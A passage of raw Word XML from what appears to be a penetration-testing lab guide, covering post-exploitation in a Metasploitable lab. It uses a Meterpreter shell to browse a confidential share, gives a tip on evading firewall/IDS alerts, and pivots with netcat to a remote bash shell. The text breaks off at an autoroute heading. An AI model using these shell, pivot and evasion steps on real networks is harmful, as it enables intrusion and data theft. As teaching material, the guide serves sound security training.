    <w:p w14:paraId="03B71590" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This path shows that the standard user we have (belonging to a Domain User group) has administration right on a machine where a domain admin is logged. This means we could possibly get its password (see post exploitation) and so becoming Domain Admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2F2C2" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Accessing files on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE7C4D9" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FF3810" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Once an attacker has compromised a user on a corporate network, he might do everything that this user can do including accessing share folders and confidential data if the user is able to access them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C779542" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FF3810" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5CDA9" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Still using the shell session obtained on the Windows 7 machine, let us try to access some confidential file! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF8737" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Using the “enum_shares”, post exploit can lead to shares discovering. However it might not always work. Another thing an attacker can try is listing mount drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D831304" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>First, let us have a shell session on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D3640" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76971F1F" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Process 2864 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91DB6E" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9BC57B" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Windows [Version 6.1.7601]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF3D433" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Copyright (c) 2009 Microsoft Corporation.  All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B20A489" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E54E6D9" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Users\jdoe\Desktop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02983E64" w14:textId="77777777" w:rsidR="006E2FDE" w:rsidRDefault="006E2FDE" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A28ECD2" w14:textId="287A9AFA" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Issue the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>net use</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3810">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1213E5" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Users\jdoe\Desktop&gt;net use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23922FB4" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>net use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CDB71" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>New connections will be remembered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB49BA" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B084FF1" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EFB58E" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Status       Local     Remote                    Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14DCBB" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E64CB19" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD05DC4" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OK                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3810">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">\\ACK-LAN-DC\confidential-data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA0052" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                Microsoft Windows Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB14A4" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3C306" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then, list this drive to see if there is anything valuable inside:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DA94D" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C:\Users\jdoe\Desktop&gt;dir \\ACK-LAN-DC\confidential-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64CCEE" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>dir \\ACK-LAN-DC\confidential-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516BE1F" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Volume in drive \\ACK-LAN-DC\confidential-data has no label.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34888840" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Volume Serial Number is 527A-2B46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DFC2AF" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473C9FB2" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Directory of \\ACK-LAN-DC\confidential-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC74DB2" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FCA44B" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>31/07/2018  16:35    &lt;DIR&gt;          .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237AA30" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>31/07/2018  16:35    &lt;DIR&gt;          ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88BE37" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">31/07/2018  16:36                43 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3810">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>report.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F62876" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               1 File(s)             43 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B0098" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               2 Dir(s)  38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:t>880</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:t>165</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:t>888 bytes free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A7CFC" w14:textId="66F56575" w:rsidR="006E2FDE" w:rsidRDefault="006E2FDE" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC5ED73" w14:textId="4A79E4C7" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker successfully get information out of the LAN network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46333BE1" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FF3810" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Note that this Meterpreter session is using a reverse HTTP Meterpreter so data are not encrypted. Using https might be a better solution to prevent the Firewall/IDS from triggering alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2E3E6" w14:textId="6D9C5776" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29107B34" w14:textId="77777777" w:rsidR="005330C6" w:rsidRDefault="005330C6" w:rsidP="00F074E3">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2557EAEB" w14:textId="705C8969" w:rsidR="005F7815" w:rsidRPr="00F074E3" w:rsidRDefault="005F7815" w:rsidP="00F074E3">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Pivoting is the process of accessing networks or machine an attacker did not have access to under normal circumstances by using compromised machines.</w:t>
      </w:r>
      <w:r w:rsidR="00630EB9">
        <w:t xml:space="preserve"> This technique allows attacker to discover and attack new networks using a machine that can access to both the attacker network and the network to compromise.</w:t>
      </w:r>
      <w:r w:rsidR="003F28EE">
        <w:t xml:space="preserve"> Every request</w:t>
      </w:r>
      <w:r w:rsidR="006E2FDE">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003F28EE">
        <w:t xml:space="preserve"> made to the new netw</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A61">
        <w:t>ork or machine is transmitted over</w:t>
      </w:r>
      <w:r w:rsidR="003F28EE">
        <w:t xml:space="preserve"> the pivot machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC1957" w14:textId="1C4ED089" w:rsidR="00F41E0F" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CAB960" w14:textId="739FBEF0" w:rsidR="00F074E3" w:rsidRDefault="00F074E3" w:rsidP="002F724A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Our goal is here to get a shell on the Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="008E6C0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 Machine (which </w:t>
      </w:r>
      <w:r w:rsidR="00EE19DA">
        <w:t>is not reachable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from another LAN than ACK_DMZ). We already have a </w:t>
      </w:r>
      <w:r w:rsidR="008D45FA">
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session on our </w:t>
      </w:r>
      <w:r w:rsidR="008D45FA">
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="008E6C0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>3 machine</w:t>
      </w:r>
      <w:r w:rsidR="008D45FA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00612115">
        <w:t xml:space="preserve">Previous scans shows that </w:t>
      </w:r>
      <w:r w:rsidR="008D45FA">
        <w:t>our target</w:t>
      </w:r>
      <w:r w:rsidR="00612115">
        <w:t xml:space="preserve"> has a bind shell on port 1524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CF213" w14:textId="523CC636" w:rsidR="0036514F" w:rsidRDefault="0036514F" w:rsidP="002F724A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The attack takes place as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF9B42" w14:textId="40AFFA0C" w:rsidR="0036514F" w:rsidRDefault="0036514F" w:rsidP="0036514F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The attacker starts two listener. One is going to be the input and the other is going to be the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BF155" w14:textId="2C6127EB" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BA805" w14:textId="69DDB186" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~# nc -lvp 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13EF58" w14:textId="4A41979A" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening on [any] 5555 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161C603" w14:textId="44E3A012" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D99D583" w14:textId="03DC809C" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~# nc -lvp 5556</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A845082" w14:textId="01A0C25C" w:rsidR="006333CE" w:rsidRPr="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening on [any] 5556 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40883F6E" w14:textId="1C933E6B" w:rsidR="0036514F" w:rsidRDefault="00634D2A" w:rsidP="0036514F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>He then starts a listener on the target machine by</w:t>
      </w:r>
      <w:r w:rsidR="0036514F">
        <w:t xml:space="preserve"> using the bind shell to get an access. This listener will provide a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5DD80" w14:textId="070B225E" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vagrant@metasploitable3-ub1404:~$ nc </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F3445" w14:textId="77777777" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@metasploitable:/# nc -lvp 9999 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CE3EC0" w14:textId="7AC4FA74" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening on [any] 9999 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DA5664" w14:textId="357CA73E" w:rsidR="0036514F" w:rsidRDefault="0036514F" w:rsidP="0036514F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The pivot command is run on the pivot machine, this will redirect attacker input to the target machine and the result to the attacker again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A28B8F6" w14:textId="0B3A268D" w:rsidR="002D36AB" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006333CE">
        <w:t xml:space="preserve">vagrant@metasploitable3-ub1404:~$ nc 192.168.21.10 5555 | nc </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="006333CE">
        <w:t xml:space="preserve"> 9999 | nc 192.168.21.10 5556</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0A89F" w14:textId="61493302" w:rsidR="006333CE" w:rsidRDefault="006333CE" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker has then an access to the target machine through the pivot machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036B01D" w14:textId="22E655EE" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D287A5F" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/Desktop/results# nc -lvp 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB437C" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening on [any] 5555 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088D5FF" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>192.168.22.20: inverse host lookup failed: Unknown host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C866B56" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>connect to [192.168.21.10] from (UNKNOWN) [192.168.22.20] 36524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD07199" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B59D5" w14:textId="26A2CCA1" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE2B22" w14:textId="6927DABA" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="006333CE">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06883B" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/Desktop/results# nc -lvp 5556</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A50856" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening on [any] 5556 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DC155" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>192.168.22.20: inverse host lookup failed: Unknown host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2E978C" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>connect to [192.168.21.10] from (UNKNOWN) [192.168.22.20] 45560</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C789C24" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0AF974" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210B207" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A9D0B" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cdrom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B79B6C" w14:textId="77777777" w:rsidR="00507483" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF1200" w14:textId="4F81C0AB" w:rsidR="00507483" w:rsidRPr="006333CE" w:rsidRDefault="00507483" w:rsidP="00507483">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B49D1C" w14:textId="48524A2B" w:rsidR="008964C5" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Using autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D43AA" w14:textId="22BECAE9" w:rsidR="00634D2A" w:rsidRPr="00BE695B" w:rsidRDefault="00D92EFE" w:rsidP="00BE695B">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
